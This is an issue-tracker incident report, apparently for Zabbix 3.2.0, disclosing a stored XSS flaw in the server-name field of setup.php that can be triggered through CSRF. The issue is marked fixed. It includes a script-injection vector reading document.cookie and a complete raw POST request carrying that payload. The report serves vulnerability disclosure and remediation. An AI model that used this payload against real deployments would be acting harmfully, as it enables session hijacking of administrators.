Details

    • Type: Incident report
    • Status: Closed
    • Priority: Trivial
    • Resolution: Fixed
    • Affects Version/s: 3.2.0
    • Fix Version/s: 3.4.0alpha1
    • Component/s: Frontend (F)
    • Labels:
    • Environment:
      LAMP

      Description

      There is a Stored XSS vulnerability in Server name parameter

      This parameter is specified during the initial setup, but since the /zabbix/setup.php still available after the setup and there is no protection against CSRF attacks, malicious attacker could convince Admin to execute the script via CSRF Attack

      Vulnerable parameter is zbx_server_name
      Example vector: </title><script>alert(document.cookie)</script>

      Example request for setting up the Server name will be:
      POST /zabbix/setup.php HTTP/1.1
      Host: 127.0.0.1
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: http://127.0.0.1/zabbix/setup.php
      Cookie: PHPSESSID=o7ok9rtqm50o0hptmppoqljen4; zbx_sessionid=da206dbd3fb3f8cb5dff506c773bd4e0; tab=2
      DNT: 1
      Connection: close
      Upgrade-Insecure-Requests: 1
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 184

      sid=5dff506c773bd4e0&form_refresh=1&zbx_server=localhost&zbx_server_port=10051&zbx_server_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&next%5B3%5D=Next+step

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              osakaaa Andrey Plastunov
            • Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: